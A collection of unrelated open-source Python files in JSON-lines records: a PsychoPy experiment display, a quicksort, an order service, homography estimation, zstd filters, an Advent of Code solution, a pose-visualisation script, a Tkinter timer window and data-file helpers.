休息结束结束后请按空格键继续实验' % self.controller.currentBlockINX\r\n        text = visual.TextStim(self.w, pos=[0, 0], text=text, color=(255, 255, 255),\r\n                               colorSpace='rgb255')\r\n        text.draw()\r\n\r\n        self.w.flip()\r\n\r\n        self.controller.endBlock = False\r\n\r\n        pass\r\n\r\n    def update(self):\r\n\r\n        self.controller.epochThisBlock = 0\r\n        \r\n        currentBlockINX = self.controller.currentBlockINX\r\n        self.controller.blockCues = self.cues[currentBlockINX]\r\n        self.controller.blockCueText = self.cueText[currentBlockINX]\r\n        self.controller.blockMask = self.masks[currentBlockINX]\r\n        text = ' >>'+''.join(self.cueText[currentBlockINX])\r\n\r\n        self.controller.dialogue = self.drawDialogue(text,color='gray',fillColor='white')\r\n        self.controller.feedback = None\r\n\r\n        self.initFrame.draw()\r\n        self.controller.dialogue.draw()\r\n\r\n        self.w.flip()\r\n        self.controller.w = self.w\r\n        self.controller.endBlock = False\r\n        self.controller.feedback = self.drawDialogue(\"\",color='White',fillColor=None)\r\n        return \r\n\r\n\r\n    def _openEyes(self):\r\n        self.w.flip()\r\n\r\n        text = 
visual.TextStim(\r\n            self.w, pos=[0, 0], text='请注释屏幕中央的标记,保持视线稳定',\r\n            color=(255, 255, 255), colorSpace='rgb255'\r\n        )\r\n        text.draw()\r\n        self.w.flip()\r\n\r\n        time.sleep(1)\r\n        \r\n        \r\n        cross = visual.ShapeStim(\r\n            win=self.w, name='polygon', vertices='cross',\r\n            size=(50, 50),\r\n            ori=0.0, pos=(0, 0),\r\n            lineWidth=1.0, colorSpace='rgb', lineColor='white', fillColor='white',\r\n            opacity=None, depth=0.0, interpolate=True)\r\n\r\n        cross.draw()\r\n        self.w.flip()\r\n        time.sleep(1)\r\n\r\n        pass\r\n\r\n    def _closeEyes(self):\r\n\r\n        text = visual.TextStim(\r\n            self.w, pos=[0, 0], text='请闭眼',\r\n            color=(255, 255, 255), colorSpace='rgb255'\r\n        )\r\n        text.draw()\r\n\r\n        self.w.flip()\r\n\r\n        time.sleep(1)\r\n\r\n        pass\r\n    \r\n\r\n    \r\n\r\n    \r\n","repo_name":"ShinlDiego/40-PschoPy","sub_path":"StimulationProcess/IdleProcess.py","file_name":"IdleProcess.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"12913956952","text":"from random import random\n\ndef quick_sort(array, left_index, right_index):\n    print(array)\n    if left_index < right_index:\n        pivot_index = partition(array, left_index, right_index)\n        quick_sort(array, left_index, pivot_index - 1)\n        quick_sort(array, pivot_index + 1, right_index)\n\ndef partition(array, start_index, end_index):\n    i = start_index - 1\n    pivot_index = end_index\n    pivot = array[pivot_index]\n    for j in range(start_index, end_index):\n        if array[j] <= pivot:\n            i += 1\n            swap_items(array, i, j)\n    swap_items(array, pivot_index, i + 1)\n    pivot_index = i + 1\n    return pivot_index\n\ndef swap_items(array, index_a, index_b):\n    temp = array[index_a]\n    array[index_a] = array[index_b]\n    array[index_b] = temp\n\na = [int(random() * 20) for _ in range(20)]\n# b = [1,3,5,2,6,3,7,4]\nquick_sort(a, 0, len(a) - 1)\nprint(a)\n","repo_name":"bibbycodes/data_structures","sub_path":"lib/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"25160698497","text":"from typing import List\n\nfrom src.entities.orders.repository import OrderRepository\nfrom src.entities.orders.schemas import (\n    CreateOrderSchema,\n    OrderInDBSchema,\n    OrderSchema,\n    PublicOrderSchema,\n)\nfrom src.settings.environment import Environment\n\n\nclass OrderService:\n    @classmethod\n    def get_all_orders(cls):\n        orders = OrderRepository.get_all_orders()\n\n        orders_with_cashback_applied = cls.__append_cashback_values(orders)\n\n        return orders_with_cashback_applied\n\n    @classmethod\n    def __append_cashback_values(cls, orders: List[OrderInDBSchema]):\n        orders_with_cashback_applied = []\n\n        for order in orders:\n            order_with_cashback = order.dict()\n\n            cashback_pct = cls.__calculate_cashback_pct(order)\n\n            order_with_cashback[\"cashback_value\"] = order.value * cashback_pct\n            order_with_cashback[\"cashback_pct\"] = f\"{int(cashback_pct * 100)}%\"\n\n            orders_with_cashback_applied.append(\n                PublicOrderSchema(**order_with_cashback)\n            )\n\n        return orders_with_cashback_applied\n\n    @classmethod\n    def __calculate_cashback_pct(cls, order: OrderInDBSchema):\n        if order.value < 1000:\n            return 0.1\n        elif order.value < 1500:\n            return 0.15\n\n        return 0.2\n\n    @classmethod\n    def create_order(cls, order: CreateOrderSchema):\n        order_to_save = OrderSchema(**order.dict())\n\n        if cls.__is_auto_aproved(order):\n            order_to_save.status = \"Aprovado\"\n\n        return 
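# A minimal standalone sketch of the cashback tiers used in the order-service
# record above (the function name and test values here are invented):
def cashback_pct_demo(value: float) -> float:
    if value < 1000:
        return 0.10
    elif value < 1500:
        return 0.15
    return 0.20

assert cashback_pct_demo(800.0) == 0.10    # 800 * 0.10 -> 80.0 cashback
assert cashback_pct_demo(1200.0) == 0.15
assert cashback_pct_demo(2000.0) == 0.20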
OrderRepository.create_new_order(order_to_save)\n\n @classmethod\n def __is_auto_aproved(cls, order):\n env = Environment()\n return order.cpf in env.AUTO_APPROVED_CPFS\n","repo_name":"vschmidt/template_fastapi","sub_path":"src/entities/orders/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37083087846","text":"import math\nimport numpy as np\nimport scipy.optimize as opt\n\nfrom typing import List\nfrom .utils import homogenous\nfrom .types import *\n\n__all__ = [\"findHomography\"]\n\n\ndef findHomography(objPts: List[Vector3d], imgPts: List[Vector2d]) -> Matrix3d:\n assert len(objPts) == len(imgPts) and len(objPts) >= 4\n objNormMat = _getNormalizationMatrix(objPts)\n imgNormMat = _getNormalizationMatrix(imgPts)\n\n n_pts = len(objPts)\n A: MatrixXd = np.zeros([2 * n_pts, 8])\n b: VectorXd = np.zeros([2 * n_pts, 1])\n for i in range(n_pts):\n objPt: Vector3d = homogenous(objPts[i][:2])\n imgPt: Vector3d = homogenous(imgPts[i])\n\n objPt = objNormMat @ objPt\n imgPt = imgNormMat @ imgPt\n\n A[2 * i, 0:3] = objPt.flatten()\n A[2 * i, 3:6] = np.zeros([3], dtype=np.float64)\n A[2 * i, 6:8] = -imgPt[0] * objPt[0:2].flatten()\n b[2 * i, 0] = imgPt[0]\n\n A[2 * i + 1, 0:3] = np.zeros([3], dtype=np.float64)\n A[2 * i + 1, 3:6] = objPt.flatten()\n A[2 * i + 1, 6:8] = -imgPt[1] * objPt[0:2].flatten()\n b[2 * i + 1, 0] = imgPt[1]\n\n H_vec: VectorXd\n if n_pts == 4:\n H_vec = np.linalg.inv(A) @ b\n else:\n U, D, Vt = np.linalg.svd(A, full_matrices=False)\n D_inv = np.zeros([8, 8], dtype=np.float64)\n for k in range(8):\n D_inv[k, k] = 0.0 if D[k] < 1e-6 else 1. / D[k]\n H_vec = Vt.T @ D_inv @ U.T @ b\n\n # the last element is always 1\n H: Matrix3d = homogenous(H_vec).reshape(3, 3)\n H = np.linalg.inv(imgNormMat) @ H @ objNormMat\n H /= H[2, 2]\n\n H = _optimizeHomography(H, objPts, imgPts)\n\n return H\n\n\ndef _getNormalizationMatrix(pts: List[Vector2d], var: float = 2.0) -> Matrix3d:\n # calculate mean\n miu_x = 0.0\n miu_y = 0.0\n for p in pts:\n miu_x += p[0]\n miu_y += p[1]\n miu_x /= len(pts)\n miu_y /= len(pts)\n\n # calculate std\n std_x = 0.0\n std_y = 0.0\n for p in pts:\n std_x += (p[0] - miu_x) * (p[0] - miu_x)\n std_y += (p[1] - miu_y) * (p[1] - miu_y)\n std_x = math.sqrt(std_x / len(pts))\n std_y = math.sqrt(std_y / len(pts))\n\n # Compose normalization matrix\n fx = math.sqrt(var) / std_x\n fy = math.sqrt(var) / std_y\n normMat = np.array(\n [[fx, 0, -fx * miu_x],\n [0, fy, -fy * miu_y],\n [0, 0, 1]])\n\n return normMat\n\n\ndef _optimizeHomography(H: Matrix3d,\n objPts: List[Vector3d],\n imgPts: List[Vector2d],\n verbose: bool = False) -> Matrix3d:\n \"\"\"\n Optimize H using Levenberg-Marquardt algorithm.\n \"\"\"\n # H has 8 DOF\n H_init: VectorXd = H.flatten()[:8]\n\n res: opt.OptimizeResult = opt.least_squares(\n _reprojection_error,\n H_init,\n _jacobian,\n method=\"lm\",\n verbose=verbose,\n args=(objPts, imgPts),\n )\n H_final: Matrix3d = homogenous(res.x).reshape(3, 3)\n\n return H_final\n\n\ndef _reprojection_error(H_vec: VectorXd,\n objPts: List[Vector3d],\n imgPts: List[Vector2d]) -> VectorXd:\n residuals: VectorXd = np.zeros([2 * len(objPts)], dtype=np.float64)\n\n H: Matrix3d = homogenous(H_vec).reshape(3, 3)\n for i in range(len(objPts)):\n objPt: Vector3d = homogenous(objPts[i][:2])\n predPt: Vector3d = H @ objPt\n predPt /= predPt[2]\n\n # add residuals:\n # Pi = [Xi, Yi, 1]\n # u = h1^T * Pi\n # v = h2^T * Pi\n # w = h3^T * 
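# A minimal numeric sketch of the reprojection residual described in the
# comment above, assuming an exact correspondence (H_demo and the point are invented):
import numpy as np

H_demo = np.array([[1.0, 0.1, 5.0],
                   [0.0, 1.2, -3.0],
                   [0.0, 0.0, 1.0]])
P = np.array([2.0, 4.0, 1.0])      # homogeneous object point [Xi, Yi, 1]
u, v, w = H_demo @ P               # u = h1^T P, v = h2^T P, w = h3^T P
x_pred, y_pred = u / w, v / w      # xi' and yi'
img = np.array([u / w, v / w])     # observed pixel, generated from H itself
Jx, Jy = img[0] - x_pred, img[1] - y_pred
assert Jx == 0.0 and Jy == 0.0     # perfect correspondence -> zero residual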
Pi\n # xi' = u / w\n # yi' = v / w\n # Jx = xi - xi'\n # Jy = yi - yi'\n residuals[2 * i] = imgPts[i][0] - predPt[0]\n residuals[2 * i + 1] = imgPts[i][1] - predPt[1]\n\n return residuals\n\n\ndef _jacobian(H_vec: VectorXd,\n objPts: List[Vector3d],\n imgPts: List[Vector2d]) -> MatrixXd:\n jac: MatrixXd = np.zeros([2 * len(objPts), len(H_vec)], dtype=np.float64)\n\n H = homogenous(H_vec).reshape(3, 3)\n for i in range(len(objPts)):\n objPt: Vector3d = homogenous(objPts[i][:2])\n predPt: Vector3d = H @ objPt\n u: float = predPt[0]\n v: float = predPt[1]\n w: float = predPt[2]\n\n # ∂Jx/∂h\n jac[2 * i, 0:3] = -objPt.flatten() / w\n jac[2 * i, 3:6] = 0.0\n jac[2 * i, 6:8] = u / (w * w) * objPt[:2].flatten()\n\n # ∂Jy/∂h\n jac[2 * i + 1, 0:3] = 0.0\n jac[2 * i + 1, 3:6] = -objPt.flatten() / w\n jac[2 * i + 1, 6:8] = v / (w * w) * objPt[:2].flatten()\n\n return jac\n","repo_name":"cvamateur/CamCalib","sub_path":"python/camcalib/homography.py","file_name":"homography.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37961870386","text":"import zstandard as zstd\n\nfrom .constants import (COMPRESSION_ZSTD, COMPRESSION_NONE)\n\n\nclass ZstdDecompressionFilter:\n def __init__(self):\n self._compress_ctx = zstd.ZstdDecompressor()\n\n def __call__(self, ctx):\n if ctx.compression == COMPRESSION_ZSTD:\n ctx.payload = self._compress_ctx.decompress(ctx.payload)\n ctx.compression = COMPRESSION_NONE\n\n\nclass ZstdCompressionFilter:\n def __init__(self, min_compression_size, *, strategy=zstd.STRATEGY_FAST):\n self._min_compression_size = min_compression_size\n self._params = zstd.CompressionParameters(strategy=strategy)\n self._compress_ctx = zstd.ZstdCompressor(\n compression_params=self._params)\n\n def __call__(self, ctx):\n if ctx.compression != COMPRESSION_NONE and \\\n len(ctx.payload) >= self._min_compression_size:\n ctx.payload = self._compress_ctx.compress(ctx.payload)\n ctx.compression = COMPRESSION_ZSTD\n","repo_name":"smfrpc/smf-pyaio","sub_path":"aiosmf/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20386704278","text":"# Author: ComradeSlyK (gregorini.silvio@gmail.com)\n# Solutions for https://adventofcode.com/2020/day/14\n\nfrom itertools import product\n\nfrom AdventOfCode.common import load_input, timer\n\n\ndef binarystr_to_decimalstr(b):\n return str(sum(2 ** i * int(c) for i, c in enumerate(reversed(b))))\n\n\ndef decimalstr_to_binarystr(d):\n n = []\n intd = int(d)\n while intd > 1:\n intd, r = divmod(intd, 2)\n n.insert(0, str(r))\n n.insert(0, str(intd))\n return ''.join(n)\n\n\n@timer\ndef problem1_solution():\n mask = ''\n mem = {}\n for line in map(lambda x: x.strip(), load_input(14, 1)):\n if line.startswith('mask'):\n mask = line.replace('mask = ', '')\n continue\n # Retrieve address and value in base 10\n addr, decval = line.replace('mem[', '').replace(']', '').split(' = ')\n # Convert value to base 2, fill chars to make its length reach 36\n binval = decimalstr_to_binarystr(decval).zfill(36)\n # Apply mask rules\n newbinval = ''.join(b if m == 'X' else m for b, m in zip(binval, mask))\n # Convert back to base 10, set in memory to its address\n mem[addr] = binarystr_to_decimalstr(newbinval)\n return sum([int(v) for v in mem.values()])\n\n\n@timer\ndef problem2_solution():\n mask = ''\n mem = {}\n for line in map(lambda x: x.strip(), 
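# Quick standalone check of the part-1 mask rule used above: an 'X' in the
# mask keeps the value's bit, while '0'/'1' overwrite it (toy 5-bit strings):
mask_demo = 'X1XX0'
binval_demo = '01011'
masked = ''.join(b if m == 'X' else m for b, m in zip(binval_demo, mask_demo))
assert masked == '01010'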
load_input(14, 2)):\n if line.startswith('mask'):\n mask = line.replace('mask = ', '')\n continue\n # Retrieve address and value in base 10\n addr, decval = line.replace('mem[', '').replace(']', '').split(' = ')\n # Convert address to base 2, fill chars to make its length reach 36\n binaddr = decimalstr_to_binarystr(addr).zfill(36)\n # Apply mask rules\n maskedaddr = ''.join(\n b if m == '0' else m if m == '1' else 'X'\n for b, m in zip(binaddr, mask)\n )\n # For each X in the masked address, apply once 0 and once 1 (so, for 2\n # Xs, we'll have 4 possible substitutions: (0, 0), (0, 1), (1, 0),\n # (1, 1), giving 4 different addresses)\n for bits in product(*[(0, 1) for _ in range(maskedaddr.count('X'))]):\n newaddr = maskedaddr.replace('X', '{}').format(*bits)\n # Convert back to base 10, set its value in memory\n mem[binarystr_to_decimalstr(newaddr)] = decval\n return sum([int(v) for v in mem.values()])\n\n\nif __name__ == '__main__':\n print(\"** Solution to problem 1: {} **\".format(problem1_solution()))\n print(\"** Solution to problem 2: {} **\".format(problem2_solution()))\n","repo_name":"SlyK182/AdventOfCode","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13276749179","text":"import os\nimport os.path as osp\nimport cv2\nimport random\nimport numpy as np\n\nimport torch\nimport torch.backends.cudnn as cudnn\n\nfrom configs.vanila_config import cfg\nfrom core.dataset.mpii import MPII_Dataset, prepare_data\nfrom core.models.vanila_vae import VAE\nfrom core.utils.functions import visualize_joints\n\nfrom sklearn.model_selection import train_test_split\n\n\ndef main():\n random_seed = 2020\n random.seed(random_seed)\n np.random.seed(random_seed)\n torch.manual_seed(random_seed)\n torch.cuda.manual_seed(random_seed)\n cudnn.benchmark = cfg.cudnn_benchmark\n torch.backends.cudnn.deterministic = cfg.cudnn_deterministic\n torch.backends.cudnn.enabled = cfg.cudnn_enable\n\n\n total_image, total_annot = prepare_data(cfg)\n train_image, valid_image, train_annot, valid_annot = train_test_split(total_image, total_annot, test_size=0.15, random_state=random_seed)\n\n t_dset = MPII_Dataset(cfg, (train_image, train_annot), train=True)\n v_dset = MPII_Dataset(cfg, (valid_image, valid_annot), train=False)\n\n model = VAE(cfg)\n model.set_dsets((t_dset, v_dset))\n model.set_optim()\n model.gpu_check()\n\n if cfg.load_weights:\n model.load(cfg.weight_path)\n print(\"model loaded.\")\n \n count = 1\n model.eval()\n model.set_loader(model.t_dset, model.cfg.valid_batch, shuffle=False)\n for idx, data in enumerate(model.loader):\n input = data[\"inputs\"].float()\n target = data[\"targets\"].float()\n \n if model.cfg.device == \"cuda\":\n input = input.cuda()\n target = target.cuda()\n \n # with torch.no_grad():\n # preds = model.forward(input)[0]\n \n # preds = preds.detach().cpu().numpy()\n # input = input.detach().cpu().numpy()\n \n # preds = np.where(input==0, preds, input)\n \n img_paths = data['img_path'][0]\n scaler = data['scaler'].detach().cpu().numpy()\n centre = data['centre'].detach().cpu().numpy()\n bboxes = data['bbox'].detach().cpu().numpy()\n\n # preds = preds.reshape(-1, 16, 2)\n # inputs = input.reshape(-1, 16, 2)\n targets = data['targets'].detach().cpu().numpy().reshape(-1, 16, 2)\n\n \n candis = range(len(targets))\n\n for candi in candis:\n img_bgr = cv2.imread(str(img_paths[candi]))\n \n # input_visibility = np.array([\n # 1 if i.all() 
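# Hedged sketch of the joint de-normalization applied just below
# (pred/target * scaler + centre); the numbers here are invented:
import numpy as np

scaler_demo = np.array([120.0, 200.0])   # per-sample scale, in pixels
centre_demo = np.array([320.0, 240.0])   # per-sample centre, in pixels
joint_norm = np.array([-0.25, 0.5])      # one normalized joint coordinate
joint_px = joint_norm * scaler_demo + centre_demo
assert joint_px.tolist() == [290.0, 340.0]   # back in image pixel coordinates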
else 0 for i in inputs[candi]\n # ]).reshape(16, 1)\n \n \n # pred = preds[candi] * scaler[candi] + centre[candi]\n # input = inputs[candi] * scaler[candi] + centre[candi]\n target = targets[candi] * scaler[candi] + centre[candi]\n visibility = np.array([1 for _ in range(len(target))]).reshape(16, 1)\n\n\n # draw joints\n # img_w_pred = visualize_joints(\n # img_bgr, np.concatenate([pred, visibility], axis=-1)\n # )\n\n # img_w_input = visualize_joints(\n # img_bgr, np.concatenate([input, input_visibility], axis=-1)\n # )\n \n img_w_orig = visualize_joints(\n img_bgr, np.concatenate([target, visibility], axis=-1)\n )\n\n # draw bbox\n # img_w_pred = cv2.rectangle(img_w_pred, \n # tuple(bboxes[candi][:2]),\n # tuple(bboxes[candi][2:]), \n # color=(0, 0, 254),\n # thickness=2, \n # lineType=cv2.LINE_AA)\n\n # img_w_input = cv2.rectangle(img_w_input, \n # tuple(bboxes[candi][:2]),\n # tuple(bboxes[candi][2:]), \n # color=(0, 0, 254),\n # thickness=2, \n # lineType=cv2.LINE_AA)\n \n img_w_orig = cv2.rectangle(img_w_orig, \n tuple(bboxes[candi][:2]),\n tuple(bboxes[candi][2:]), \n color=(0, 0, 254),\n thickness=2, \n lineType=cv2.LINE_AA)\n \n # save\n folder = \"train\"\n \n # path = str(model.cfg.root / folder / \"pred\")\n # if not osp.exists(path):\n # os.makedirs(path, exist_ok=True)\n # cv2.imwrite(osp.join(path, f\"{count}_pred.jpg\"), img_w_pred)\n\n # path = str(model.cfg.root / folder / \"input\")\n # if not osp.exists(path):\n # os.makedirs(path, exist_ok=True)\n # cv2.imwrite(osp.join(path, f\"{count}_input.jpg\"), img_w_input)\n\n path = str(model.cfg.root / folder / \"orig\")\n if not osp.exists(path):\n os.makedirs(path, exist_ok=True)\n cv2.imwrite(osp.join(path, f\"{count}_orig.jpg\"), img_w_orig)\n\n count += 1\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"heimish-kyma/filling-the-gap","sub_path":"valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23604334435","text":"import io\nimport tkinter as tk\n\nfrom PIL import Image, ImageTk\n\nfrom module.drag_handler import DraggableWidgetHandler\n\n\nclass ReferenceWindow(tk.Tk):\n def __init__(\n self,\n duration: int,\n image: list[io.BytesIO],\n position: tuple[int, int],\n size: tuple[int, int],\n ):\n super().__init__()\n\n # configure window\n self.attributes(\"-topmost\", True)\n self.focus_force()\n self.overrideredirect(True)\n self.geometry(f\"+{position[0]}+{position[1]}\")\n self.configure(\n bg=\"black\",\n highlightbackground=\"black\",\n highlightcolor=\"black\",\n highlightthickness=2,\n )\n\n # time\n self.duration: int = duration * 60 + 1\n self.paused: bool = False\n self.remaining_time: int = self.duration\n # image\n self.current_image: int = 0 # store which image is currently displayed\n self.position: tuple = position # top-left corner\n self.size: tuple = size\n self.images: int = self.convert(image)\n # misc\n self.timer_update_call = None\n\n # widgets\n self.timer = tk.Label(self) # place holder for the timer\n\n self.picture = tk.Label(\n self,\n bg=\"black\",\n highlightbackground=\"black\",\n image=self.images[self.current_image],\n )\n\n self.cover = tk.Canvas(\n self,\n bg=\"black\",\n border=0,\n highlightbackground=\"white\",\n highlightcolor=\"black\",\n highlightthickness=1,\n )\n\n self.exit_button = tk.Button(\n self,\n bg=\"white\",\n command=self.destroy,\n fg=\"black\",\n font=(\"Small Fonts\", 10, \"bold\"),\n height=1,\n 
highlightbackground=\"white\",\n highlightcolor=\"black\",\n relief=\"flat\",\n text=\"X\",\n width=2,\n )\n\n self.pause_button = tk.Button(\n self,\n bg=\"white\",\n command=self.pause,\n fg=\"black\",\n font=(\"Small Fonts\", 10, \"bold\"),\n height=1,\n highlightbackground=\"white\",\n highlightcolor=\"black\",\n relief=\"flat\",\n text=\"II\",\n width=2,\n )\n\n # setup the drag handler\n draggable_widgets = [self.picture, self.timer, self.cover]\n self.drag_handler = DraggableWidgetHandler(self, draggable_widgets)\n\n # place widgets on grid\n self.grid_columnconfigure(1, weight=2)\n self.exit_button.grid(row=0, column=2, sticky=\"nesw\", pady=2, padx=2)\n self.pause_button.grid(row=0, column=0, sticky=\"nesw\", pady=2, padx=2)\n self.picture.grid(row=1, column=0, columnspan=3)\n self.timer.grid(row=0, column=1, sticky=\"nesw\")\n\n self.bind(\"\", self.drag_handler.start_move)\n self.bind(\"\", self.drag_handler.do_move)\n self.bind(\"\", self.drag_handler.stop_move)\n # lambda _ to catch the event variabe send by bind\n self.bind(\"\", lambda _: self.destroy())\n self.bind(\"\", lambda _: self.pause())\n\n def convert(self, image: list[io.BytesIO]) -> list[ImageTk.PhotoImage]:\n converted_images = []\n\n for data in image:\n # load and strech the image\n image = Image.open(data)\n ratio = min(self.size[0] / image.width, self.size[1] / image.height)\n new_size = (int(image.width * ratio), int(image.height * ratio))\n image = ImageTk.PhotoImage(image.resize(new_size))\n converted_images.append(image)\n\n return converted_images\n\n def pause(self) -> None:\n self.paused = not self.paused\n\n if self.paused:\n self.after_cancel(self.timer_update_call)\n self.picture.grid_forget()\n self.cover.grid(row=1, column=0, columnspan=3)\n self.cover.configure(\n height=self.picture.winfo_height() - 2,\n width=self.picture.winfo_width() - 2,\n )\n\n else:\n self.cover.grid_forget()\n self.picture.grid(row=1, column=0, columnspan=3)\n self.timer_update_call = self.after(500, self.update_timer)\n\n def update_image(self) -> None:\n self.current_image += 1\n if self.current_image >= len(self.images):\n self.destroy()\n else:\n self.picture.configure(image=self.images[self.current_image])\n\n def update_timer(self) -> None:\n self.remaining_time -= 1\n minutes, seconds = divmod(self.remaining_time, 60)\n self.timer.configure(\n bg=\"white\",\n font=(\"Small Fonts\", 15, \"bold\"),\n highlightbackground=\"black\",\n highlightthickness=2,\n text=f\"{(minutes):02}:{(seconds):02}\",\n )\n\n if self.remaining_time >= 0:\n self.timer_update_call = self.after(1000, self.update_timer)\n else:\n self.after_cancel(self.timer_update_call)\n self.remaining_time = self.duration\n self.update_timer()\n self.update_image()\n\n def run(self) -> None:\n self.update_timer()\n self.mainloop()\n","repo_name":"Undeadamien/photo_reference_app","sub_path":"module/reference_window.py","file_name":"reference_window.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70492687849","text":"\"\"\"\nincrement_version.py\nwritten in Python3\nauthor: C. 
Lockhart \n\"\"\"\n\n\nimport yaml\n\n# Read in version\nwith open('version.yml', 'r') as f:\n    version = yaml.safe_load(f.read())\n\n# Strip \"dev\" out of micro\nversion['micro'] = int(str(version['micro']).replace('dev', ''))\n\n# Update patch\nversion['micro'] += 1\n\n# Add \"dev\" back to patch\nif version['micro'] != 0:\n    version['micro'] = 'dev' + str(version['micro'])\n\n# Output version\nwith open('version.yml', 'w') as f:\n    yaml.safe_dump(version, f, sort_keys=False)\n\n# Transform version dict to string\nversion = '.'.join([str(version[key]) for key in ['major', 'minor', 'micro']])\n\n# Write version string to pathogen/_version.py\nwith open('pathogen/version.py', 'w') as f:\n    f.write(\"__version__ = '{}'\\n\".format(version))\n\n# Return\nprint(version)\n","repo_name":"clockhart/pathogen","sub_path":"_scripts/increment_version.py","file_name":"increment_version.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12037581852","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 21 14:31:11 2023\n\n@author: garya\n\nThis set of routines is used as a standard way to interact with files in \nOpen-FF. \n\nDataframes will typically be stored and read as parquet.\ndefault_file_type = 'parquet'\n\nWhen dataframes need to be shared, such as when they need to be hand curated\nin a spreadsheet, CSV can be generated and read with these routines\n\n\"\"\"\nimport pandas as pd\nimport os\nimport requests\nimport urllib\nfrom openFF.common.handles import curr_data\n\n# this is the list of FF fields that should be treated as text columns in CSV file\nlst_str_cols = ['APINumber','bgCAS','api10','IngredientName','CASNumber','test',\n                'Supplier','OperatorName','TradeName','Purpose',\n                'rawName','cleanName','xlateName', # for companyXlate...\n                'curatedCAS', # in CAS and casing curation files\n                ]\n\n\n#### Interacting with files in local situations\n\ndef store_df_as_csv(df,fn,encoding='utf-8',str_lst = lst_str_cols):\n    # saves files in standard encoding, and single quote added in front of every value in \n    # columns in str_lst, to make them be interpreted as strings by excel (a \"literal\" value)\n    t = df.copy()\n    for col in str_lst:\n        if col in t.columns:\n            # print(col)\n            t[col] = \"'\"+t[col]\n    t.to_csv(fn,encoding=encoding)\n    \ndef get_csv(fn,check_zero=True,encoding='utf-8',sep=',',quotechar='\"',\n            str_cols = lst_str_cols):\n    # check_zero: make sure str fields don't have an abundance of \"'\" in zero position\n    dict_dtypes = {x : 'str'  for x in str_cols}\n    t = pd.read_csv(fn,encoding=encoding, low_memory=False, sep=sep,\n                    quotechar=quotechar, dtype=dict_dtypes)\n    if check_zero:\n        for col in str_cols:\n            if col in t.columns:\n                #print(col)\n                test = t[col].str[0]== \"'\" \n                assert test.sum()==0\n    return t\n\ndef save_df(df,fn):\n    tup = os.path.splitext(fn)\n    if tup[1]=='':\n        df.to_parquet(fn+'.parquet')\n    elif tup[1]=='.csv':\n        store_df_as_csv(df,fn)\n    elif tup[1]=='.parquet':\n        df.to_parquet(fn)\n    else:\n        print(f'{fn}: Extension <{tup[1]}> not valid for \"save_df\"')\n        assert 1==0\n    \ndef get_df(fn,cols=None):\n    tup = os.path.splitext(fn)\n    if tup[1]=='':\n        return pd.read_parquet(fn+'.parquet',columns=cols)\n    elif tup[1]=='.csv':\n        return get_csv(fn)\n    elif tup[1]=='.parquet':\n        return pd.read_parquet(fn,columns=cols)\n    else:\n        print(f'{fn}: Extension <{tup[1]}> not valid for \"get_df\"')\n        assert 1==0\n\ndef get_table(repo_dir='', repo_name='current_repo',tname='disclosures',cols=None):\n    \"\"\" Used to pull in repo's pickled tables\"\"\"\n    return pd.read_parquet(os.path.join(repo_dir,repo_name,'pickles',tname+'.parquet'),\n                           columns=cols)\n\n##################### Interacting with remote files ##############\n\ndef 
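# Worked example of the dev-version bump in the increment_version record
# above (the version values here are hypothetical):
ver = {'major': 1, 'minor': 2, 'micro': 'dev3'}
ver['micro'] = int(str(ver['micro']).replace('dev', ''))   # 'dev3' -> 3
ver['micro'] += 1                                          # -> 4
if ver['micro'] != 0:
    ver['micro'] = 'dev' + str(ver['micro'])               # -> 'dev4'
assert '.'.join(str(ver[k]) for k in ['major', 'minor', 'micro']) == '1.2.dev4'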
get_size_of_url_file(url):\n    response = requests.head(url,allow_redirects=True)\n    return int(response.headers['Content-Length'])\n\ndef fetch_file_from_url(url,fn):\n    # get file from url, save it at fn\n    sz = get_size_of_url_file(url)\n    if sz>100000000: # alert that a large file download is in progress\n        print('Fetching file, please be patient...')\n    urllib.request.urlretrieve(url,fn)\n\ndef get_df_from_url(df_url,df_fn,force_freshen=False,inp_format='parquet'):\n    # get file from url, checking first if it already exists, then convert to dataframe\n    if force_freshen:\n        fetch_file_from_url(df_url,df_fn)\n    else:\n        if os.path.isfile(df_fn):\n            print('File already downloaded')\n        else: \n            fetch_file_from_url(df_url,df_fn)\n    \n    print('Creating full dataframe...')\n    assert inp_format=='parquet'\n    return pd.read_parquet(df_fn)\n\n#### get specific data sets\n\ndef get_curr_df(curr_data=curr_data,cols=[]):\n    # Fetch openFF data frame from the current repository\n    if cols!=[]: # not empty so filter\n        return pd.read_parquet(curr_data,columns=cols)\n    return pd.read_parquet(curr_data) \n\n##### external file dictionary handler\ndef get_ext_master_dic(url=\"https://storage.googleapis.com/open-ff-common/ext_data/ext_data_master_list.csv\"):\n    # pulling from main cloud source\n    df = get_df(url)\n    out = {}\n    for i,row in df[df.inc_remote=='Yes'].iterrows():\n        out[row.ref_handle] = row.filename\n    \n    return out\n\ndef ext_fn(ext_dir=\"https://storage.googleapis.com/open-ff-common/ext_data/\",\n           handle='state_latlon'):\n    masterfn = 'ext_data_master_list.csv'\n    if ext_dir[:4] == 'http': # through urls\n        ext_dict = get_ext_master_dic(ext_dir+masterfn)\n        return 